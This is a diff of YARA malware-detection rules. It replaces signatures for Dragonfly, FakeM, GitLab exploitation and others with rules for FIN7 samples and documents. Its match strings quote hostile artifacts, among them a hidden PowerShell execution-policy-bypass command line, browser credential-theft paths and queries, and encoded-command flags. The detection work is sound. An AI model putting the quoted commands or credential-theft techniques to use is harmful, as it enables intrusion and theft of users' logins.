+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
 
 	strings:
-		$a1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
-		$a2 = {4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 3b 20 54 72 69 64 65 6e 74 2f 37 2e 30 3b 20 72 76 3a 31 31 2e 30 29 20 6c 69 6b 65 20 47 65 63 6b 6f 00 00 00 00}
-		$fp1 = "Esumsoft" wide
-		$fp2 = "Acunetix" wide ascii
-		$fp3 = "TASER SYNC" ascii
+		$x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
+		$x2 = "/*|*| *  Copyright 2016 Microsoft, Industries.|*| *  All rights reserved.|*|" ascii
+		$x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
+		$x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
+		$x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0xcfd0 and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Liudoor : WIN32_DLL
+rule SIGNATURE_BASE_APT_FIN7_Maldoc_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects Liudoor daemon backdoor"
-		author = "RSA FirstWatch"
-		id = "cf7e08b8-2ccd-5828-917b-11340b4a86b1"
-		date = "2015-07-23"
+		description = "Detects malicious Doc from FIN7 campaign"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f3c430e0-be9a-5c3f-9378-a20ef0492afb"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta_liudoor.yar#L1-L25"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L51-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f60002d0173a8ebd2b407e79377d4816e699742aedb1e0649b08fd4ca6cf359"
+		logic_hash = "f3ecf77a5f909361f4a6af5ca0f25ec85721570587500a8ce2ef203158472e47"
 		score = 75
 		quality = 85
-		tags = "WIN32 DLL"
-		hash0 = "78b56bc3edbee3a425c96738760ee406"
-		hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
-		hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
-		hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
-		hash4 = "6093505c7f7ec25b1934d3657649ef07"
-		type = "Win32 DLL"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
 
 	strings:
-		$string0 = "Succ"
-		$string1 = "Fail"
-		$string2 = "pass"
-		$string3 = "exit"
-		$string4 = "svchostdllserver.dll"
-		$string5 = "L$,PQR"
-		$string6 = "0/0B0H0Q0W0k0"
-		$string7 = "QSUVWh"
-		$string8 = "Ht Hu["
+		$s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click  \"Enable editing\" from the yellow bar above" ascii
 
 	condition:
-		all of them
+		filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_CVE_2021_22205 : CVE_2021_22205
+rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects signs of exploitation of GitLab CE CVE-2021-22205"
+		description = "Detects FIN7 samples mentioned in FireEye report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21cc6fa7-e50d-5b8e-815d-27315ab5635d"
-		date = "2021-10-26"
+		id = "0fdd98e8-7536-5159-8085-da7388e5fff2"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_gitlab_cve_2021_22205.yar#L2-L27"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L66-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "54b841716a6bd56706c1c38fcda9a27ffd7feba2660602b191e8e347983e578d"
-		score = 70
+		logic_hash = "5ff078f8cb93a841b68521cfbc120b18952c7ff5b56ab2f3b0eebf63a10aa572"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-22205"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1e95ac1bb684186e9fb5c67f75c7c26ddc8b18ebfdaf061742ddf1675e17d55"
+		hash2 = "dc645aae5d283fa175cf463a19615ed4d16b1d5238686245574d8a6a8b0fc8fa"
+		hash3 = "eebbce171dab636c5ac0bf0fd14da0e216758b19c0ce2e5c572d7e6642d36d3d"
 
 	strings:
-		$sa1 = "VXNlci5maW5kX2J5KHVzZXJuYW1l" ascii
-		$sa2 = "VzZXIuZmluZF9ieSh1c2VybmFtZ" ascii
-		$sa3 = "Vc2VyLmZpbmRfYnkodXNlcm5hbW" ascii
-		$sb1 = "dXNlci5hZG1pb" ascii
-		$sb2 = "VzZXIuYWRtaW" ascii
-		$sb3 = "1c2VyLmFkbWlu" ascii
-		$sc1 = "dXNlci5zYXZlI" ascii
-		$sc2 = "VzZXIuc2F2ZS" ascii
-		$sc3 = "1c2VyLnNhdmUh" ascii
+		$s1 = "\\par var console=\\{\\};console.log=function()\\{\\};" ascii
+		$s2 = "616e64792d7063" ascii
+		$x1 = "0043003a005c00550073006500720073005c0061006e00640079005c004400650073006b0074006f0070005c0075006e00700072006f0074006500630074" ascii
+		$x2 = "780065006300750074006500280022004f006e0020004500720072006f007200200052006500730075006d00650020004e006500780074003a0073006500" ascii
+		$x3 = "\\par \\tab \\tab \\tab sh.Run \"powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File \" & pToPSCb, 0, False" fullword ascii
+		$x4 = "002e006c006e006b002d00000043003a005c00550073006500720073005c007400650073007400610064006d0069006e002e0054004500530054005c0044" ascii
+		$x5 = "005c00550073006500720073005c005400450053005400410044007e0031002e005400450053005c0041007000700044006100740061005c004c006f0063" ascii
+		$x6 = "6c00690063006100740069006f006e002200220029003a00650078006500630075007400650020007700700072006f0074006500630074002e0041006300" ascii
+		$x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii
+		$x8 = "\\par \\tab \\tab sh.Run \"%comspec% /c tasklist >\"\"\" & tpath & \"\"\" 2>&1\", 0, true" fullword ascii
+		$x9 = "00720079007b006500760061006c0028002700770061006c006c003d004700650074004f0062006a0065006300740028005c005c0027005c005c00270027" ascii
+		$x10 = "006e00640079005c004400650073006b0074006f0070005c0075006e006c006f0063006b002e0064006f0063002e006c006e006b" ascii
 
 	condition:
-		1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+		uint16( 0 ) == 0x5c7b and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_Malformed_JPG_CVE_2021_22204 : CVE_2021_22204 CVE_2021_22205 FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects malformed JPG files exploting EXIF vulnerability CVE-2021-22204 and used in the exploitation of GitLab vulnerability CVE-2021-22205"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3d769340-0306-596d-8783-2b37b93a5673"
-		date = "2021-10-26"
+		id = "46c82d27-5683-5acd-9a3c-d69613091ecc"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_gitlab_cve_2021_22205.yar#L29-L44"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L95-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0718ad24337acbb746c6e0d7e0b42d2d034ff583ec6fd12b34fda4737d7e78b0"
-		score = 70
-		quality = 58
-		tags = "CVE-2021-22204, CVE-2021-22205, FILE"
+		logic_hash = "7144d4c7651e3fb288ef608fdff07af6cb223c90c34fb780d65184760386d5c7"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
 
 	strings:
-		$h1 = { 41 54 26 54 46 4F 52 4D }
-		$sr1 = /\(metadata[\s]{0,3}\([A-Za-z]{1,20} "\\/
+		$s1 = "Manche Enterprises Limited0" fullword ascii
 
 	condition:
-		filesize < 10KB and $h1 and $sr1
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_Exp_EPS_CVE20152545 : CVE_2015_2545 FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_2 : FILE
 {
 	meta:
-		description = "Detects EPS Word Exploit CVE-2015-2545"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a5f0554-b588-5b82-93df-0fdfba2af2da"
-		date = "2017-07-19"
+		id = "4522cd85-ba85-5afd-8600-1ebabfaf6d02"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "Internal Research - ME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2545.yar#L2-L16"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L110-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1aac80a06dd71352d2776b4dfccce901d47363459853a37669af69be6e962c7"
-		score = 70
+		logic_hash = "8e62c9488f211635ae30633a0d894b00e0ba2a7e7d4cb628117a166d4f0f9697"
+		score = 75
 		quality = 85
-		tags = "CVE-2015-2545, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
 
 	strings:
-		$s1 = "word/media/image1.eps" ascii
-		$s2 = "-la;7(la+" ascii
+		$s1 = "constructor or from DllMain." fullword ascii
+		$s2 = "Network Software Ltd0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and ( $s1 and #s2 > 20 )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-
-rule SIGNATURE_BASE_Unspecified_Malware_Sep1_A1 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_3 : FILE
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cff49e85-c8c3-5240-9948-0551e38e7040"
-		date = "2017-09-12"
+		id = "0b0ce882-1c18-5741-bb71-0cef010dc778"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L13-L27"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L126-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d235dc964ac74d2b635251d07b2a9119b731a6c3c45b6b2a81ca88e6fc8b63b7"
+		logic_hash = "3f757bc4a6d46be85732fe33dd0a323c5774cbc1f0da2b984c5db14c1362745a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
+		hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
+
+	strings:
+		$s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
+		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imphash ( ) == "17a4bd9c95f2898add97f309fc6f9bcd" )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_1 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_4 : FILE
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d219a54e-cb76-5c56-b64c-5019e811eeb1"
-		date = "2017-09-12"
+		id = "bead79bb-28c2-59ed-985b-e44b41e7f66a"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L29-L44"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L142-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c885fb690b7e047203529f0c4a6dd60dea822ce60a47e42b52d3216bc26da62e"
+		logic_hash = "cd8a33c4e4f626d744e03f48e093f6a45223c74088b03185833ece8034614ca4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9"
+		hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
 
 	strings:
-		$s1 = "\\Update\\Temp\\ufiles.txt" wide
-		$s2 = "%02d.%02d.%04d %02d:%02d" fullword wide
-		$s3 = "*pass*.*" fullword wide
+		$s1 = "c:\\file.dat" fullword wide
+		$s2 = "constructor or from DllMain." fullword ascii
+		$s3 = "lineGetCallIDs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_2 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_5 : FILE
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e64f121d-a628-54b5-88f3-96eea388c155"
-		date = "2017-09-12"
-		modified = "2023-01-06"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L46-L66"
+		id = "6c810662-9ceb-5c3b-8f83-5a4aa2a5d461"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L159-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "433711dd15c8d1044b381046747194e47402288df06da6bbc61055dc9c90f52a"
+		logic_hash = "893e144d86025db750b32ae69964578ec92862face706339a5bafb393e3c7091"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "178348c14324bc0a3e57559a01a6ae6aa0cb4013aabbe324b51f906dcf5d537e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$s1 = "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" wide
-		$s2 = "C:\\Users\\Public\\Log.txt" fullword wide
-		$s3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" fullword wide
-		$s4 = "***************** Mozilla Firefox ****************" fullword wide
-		$s5 = "********************** Opera *********************" fullword wide
-		$s6 = "\\AppData\\Local\\Microsoft\\Credentials\\" wide
-		$s7 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\" wide
-		$s8 = "**************** Internet Explorer ***************" fullword wide
+		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+		$s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
 
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_3 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_6 : FILE
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4eafd732-80bc-5f50-bf0d-096df4d35d61"
-		date = "2017-09-12"
+		id = "2b2e6b74-5d71-5656-8faf-37c94607d93e"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L68-L89"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L175-L198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f564685eb1426d1a3eb888a888bfdf3a8fa9bc96af07fb0bc5f10c0a324f1d9d"
+		logic_hash = "33db8e61b6220d9e16191228573d3d375cce9528241dcf1ad74d641f0959f03b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
+		hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
 
 	strings:
-		$s1 = "kernel64.dll" fullword ascii
-		$s2 = "ws2_32.dQH" fullword ascii
-		$s3 = "HGFEDCBADCBA" fullword ascii
-		$s4 = "AWAVAUATWVSU" fullword ascii
+		$s1 = "coreServiceShell.exe" fullword ascii
+		$s2 = "PtSessionAgent.exe" fullword ascii
+		$s3 = "TiniMetI.exe" fullword ascii
+		$s4 = "PwmSvc.exe" fullword ascii
+		$s5 = "uiSeAgnt.exe" fullword ascii
+		$s7 = "LHOST:" fullword ascii
+		$s8 = "TRANSPORT:" fullword ascii
+		$s9 = "LPORT:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( pe.imphash ( ) == "6f03fb864ff388bac8680ac5303584be" or all of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.exports ( "TiniStart" ) or 4 of them )
 }
-rule SIGNATURE_BASE_Dragonfly_APT_Sep17_4 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_7 : FILE
 {
 	meta:
-		description = "Detects malware from DrqgonFly APT report"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dbc0eebf-fc81-5a0b-b2e0-129d0b40b6f7"
-		date = "2017-09-12"
+		id = "96943654-a6e8-59c0-ab6c-1ab3906a5d05"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dragonfly.yar#L91-L109"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L200-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61af81f0cd1eccba3a1000e6715c9715e8e67849e5edd4279728a7e47bd8cb75"
+		logic_hash = "212bc13d22d7bc6b0ef10ae034ea09c7ea0d0e66afd212fb55c09cf43344c2ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
+		hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
 
 	strings:
-		$s1 = "screen.exe" fullword wide
-		$s2 = "PlatformInvokeUSER32" fullword ascii
-		$s3 = "GetDesktopImageF" fullword ascii
-		$s4 = "PlatformInvokeGDI32" fullword ascii
-		$s5 = "GetDesktopImage" fullword ascii
-		$s6 = "Too many arguments, going to store in current dir" fullword wide
+		$s1 = "libpng version" fullword ascii
+		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Fakem_Generic : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_8 : FILE
 {
 	meta:
-		description = "Detects FakeM malware samples"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51a285ce-a4cb-5068-b079-a8227690365f"
-		date = "2016-01-25"
-		modified = "2023-01-06"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fakem_backdoor.yar#L8-L49"
+		id = "1eb9810e-2b50-5a93-925e-073bb17e1e6c"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L216-L229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0ee606be48961d1e4c1fd9e0e10b53603cfd62cec652baef62f893c0a9e9684c"
-		score = 85
+		logic_hash = "f15a8dfd3efb094ab73caebe9bffb5735762960445ca421cd49eaa091ecea300"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
-		hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
-		hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
-		hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
-		hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
-		hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
-		hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
-		hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
-		hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
-		hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
-		hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
+		hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
 
 	strings:
-		$a1 = "\\system32\\kernel32.dll" ascii
-		$a2 = "\\boot.lnk" ascii
-		$a3 = "%USERPROFILE%" fullword ascii
-		$b1 = "Wizard.EXE" fullword wide
-		$b2 = "CommandLineA" fullword ascii
-		$c1 = "\\system32\\kernel32.dll" ascii
-		$c2 = "\\aapz.tmp" ascii
-		$e1 = "C:\\Documents and Settings\\A\\" ascii
-		$e2 = "\\svchost.exe" ascii
-		$e3 = "\\Perform\\Release\\Perform.pdb" ascii
-		$f1 = "Browser.EXE" fullword wide
-		$f2 = "\\browser.exe" ascii
+		$s1 = "GetL3st3rr" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $e* ) or 1 of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Powershell_Susp_Parameter_Combo : HIGHVOL FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_10 : FILE
 {
 	meta:
-		description = "Detects PowerShell invocation with suspicious parameters"
+		description = "Detects sample from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "17c707f3-7f51-5772-9874-a96c220960a7"
-		date = "2017-03-12"
-		modified = "2022-09-15"
-		reference = "https://goo.gl/uAic1X"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_invocation.yar#L2-L76"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d56d97b4f0506430f21ccb029524111c404c03f8cef25710b96c6c0915fdcf22"
-		score = 60
-		quality = 31
-		tags = "HIGHVOL, FILE"
-
-	strings:
-		$sa1 = " -enc " ascii wide nocase
-		$sa2 = " -EncodedCommand " ascii wide nocase
-		$sa3 = " /enc " ascii wide nocase
-		$sa4 = " /EncodedCommand " ascii wide nocase
-		$sb1 = " -w hidden " ascii wide nocase
-		$sb2 = " -window hidden " ascii wide nocase
-		$sb3 = " -windowstyle hidden " ascii wide nocase
-		$sb4 = " /w hidden " ascii wide nocase
-		$sb5 = " /window hidden " ascii wide nocase
-		$sb6 = " /windowstyle hidden " ascii wide nocase
-		$sc1 = " -nop " ascii wide nocase
-		$sc2 = " -noprofile " ascii wide nocase
-		$sc3 = " /nop " ascii wide nocase
-		$sc4 = " /noprofile " ascii wide nocase
-		$sd1 = " -noni " ascii wide nocase
-		$sd2 = " -noninteractive " ascii wide nocase
-		$sd3 = " /noni " ascii wide nocase
-		$sd4 = " /noninteractive " ascii wide nocase
-		$se1 = " -ep bypass " ascii wide nocase
-		$se2 = " -exec bypass " ascii wide nocase
